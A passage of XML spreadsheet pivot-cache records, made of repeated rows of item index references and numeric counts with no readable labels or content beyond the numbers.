  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="552"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="552"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="552"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="30"/>
    <x v="552"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="38"/>
    <x v="552"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="28"/>
    <x v="552"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="19"/>
    <x v="552"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="552"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="552"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="18"/>
    <x v="552"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="519"/>
    <x v="552"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="552"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="552"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="553"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="553"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="553"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="553"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="553"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="553"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="553"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="553"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="553"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="553"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="553"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="553"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="553"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="553"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="554"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="554"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="554"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="554"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="554"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="554"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="554"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="554"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="554"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="554"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="554"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="554"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="554"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="554"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="555"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="555"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="555"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="555"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="555"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="555"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="555"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="555"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="555"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="555"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="555"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="555"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="555"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="555"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="556"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="556"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="556"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="556"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="556"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="556"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="556"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="556"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="556"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="556"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="11"/>
    <x v="556"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="8"/>
    <x v="556"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="556"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="556"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="557"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="557"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="557"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="557"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="557"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="557"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="76"/>
    <x v="557"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="177"/>
    <x v="557"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="557"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="557"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="557"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="557"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="557"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="557"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="557"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="557"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="62"/>
    <x v="557"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="557"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="558"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="559"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="559"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="559"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="559"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="559"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="559"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="559"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="559"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="559"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="559"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="559"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="559"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="559"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="559"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="560"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="560"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="560"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="560"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="560"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="560"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="560"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="560"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="560"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="560"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="560"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="560"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="560"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="560"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="561"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="561"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="561"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="561"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="561"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="561"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="561"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="561"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="561"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="561"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="561"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="561"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="561"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="561"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="562"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="562"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="562"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="562"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="562"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="562"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="562"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="562"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="562"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="562"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="562"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="562"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="562"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="562"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="563"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="563"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="563"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="563"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="563"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="563"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="563"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="563"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="563"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="563"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="563"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="563"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="563"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="563"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="564"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="564"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="564"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="564"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="564"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="564"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="564"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="564"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="564"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="564"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="564"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="19"/>
    <x v="564"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="564"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="564"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="565"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="565"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="565"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="565"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="565"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="565"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="565"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="565"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="565"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="565"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="565"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="565"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="565"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="565"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="566"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="566"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="566"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="566"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="566"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="566"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="566"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="566"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="566"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="566"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="566"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="566"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="566"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="566"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="567"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="567"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="567"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="567"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="567"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="18"/>
    <x v="567"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="14"/>
    <x v="567"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="567"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="567"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="6"/>
    <x v="567"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="48"/>
    <x v="567"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="69"/>
    <x v="567"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="567"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="567"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="513"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="513"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="513"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="513"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="568"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="568"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="568"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="568"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="568"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="568"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="568"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="568"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="568"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="568"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="568"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="568"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="568"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="568"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="569"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="569"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="569"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="569"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="569"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="17"/>
    <x v="569"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="569"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="569"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="6"/>
    <x v="569"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="14"/>
    <x v="569"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="569"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="569"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="569"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="569"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="10"/>
    <x v="569"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="178"/>
    <x v="569"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="57"/>
    <x v="569"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="570"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="570"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="570"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="570"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="570"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="570"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="570"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="570"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="570"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="570"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="570"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="570"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="570"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="570"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="571"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="571"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="571"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="571"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="571"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="571"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="571"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="571"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="571"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="571"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="571"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="571"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="571"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="571"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="572"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="572"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="572"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="572"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="572"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="572"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="572"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="572"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="572"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="572"/>
  </r>
